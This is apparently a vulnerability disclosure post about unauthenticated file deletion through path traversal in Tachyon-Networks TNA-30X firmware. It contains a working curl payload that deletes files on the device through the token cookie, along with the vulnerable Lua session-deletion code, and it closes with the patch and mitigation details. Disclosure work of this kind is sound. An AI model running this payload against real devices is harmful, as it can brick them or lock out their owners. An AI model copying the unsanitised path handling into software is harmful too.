Tachyon-Networks - Unauthenticated File Deletion Vulnerability

Published on 01 . 09 . 2024 • 3 min read •

Overview

HTTP DELETE requests to the login http endpoint /cgi.lua/login does not perform validation of token, allowing for any file to be deleted if supplied as a token (eg. TOKEN=../../../../etc/passwd)

This vulnerability could be used to perform a denial of service by crashing / bricking or locking authorised users out of the device.

Impacted Firmwares

This has been tested on TNA-30X firmwares 1.11.4 and 1.12.0 (beta 1) with both being vulnerable, older firmwares are also likely to be impacted

Exploit Steps

Run the below payload to delete the intended file

FILE_TO_DELETE="../../../../tmp/etc/http/web-plain.json";
TARGET="192.168.1.1";
curl -i -s -k -X $'DELETE' \
    -H "Host: $TARGET" \
    -b "token=$FILE_TO_DELETE" \
    "https://$TARGET/cgi.lua/login"

Vulnerable Code

Below is a sample of the code that is responsible for the vulnerability, whilst some sanitisation is performed it does not cover all possible command injections.

login.lua

--- Clears user authentication.
-- DELETE */login
-- Request params: no parms
-- Response:
-- - empty body (status code 204) on success,
-- - error message on failure.
local function auth_logout(req, res)
	local token = req.cookies["api_token"]
	if not token then
		return false, 400, "Token cookie is missing"
	end

	session.delete_session(token)
	security.erase_token(res)

	return { status = "ok" }
end

local function login(req, res)
	if req.method == "GET" then
		return auth_get(req, res)
	elseif req.method == "POST" then
		return auth_login(req, res)
	elseif req.method == "DELETE" then
		return auth_logout(req, res)
	else
		return false, 404, "No service"
	end
end

session.lua

--- Delete existing web session.
-- Checks and removes active session
-- @param session_id Session ID to look for
local function del_session(session_id)
	local session_file = path.join(SESSION_DIR, session_id)
	if not path.is_file(session_file) then
		return
	end

	sysio.remove_file(session_file)
end

local module = {
	...
	delete_session = del_session,
	...
}
return module

Outcomes

After submitting the disclosure report to Tachyon-Networks the vulnerability was patched and new firmware released.

No CVE IDs have been assigned as of this post.

Affected Products:

Tachyon-Network TNA and TNS series devices

Mitigation:

Update impacted devices to Version 1.11.5 or later.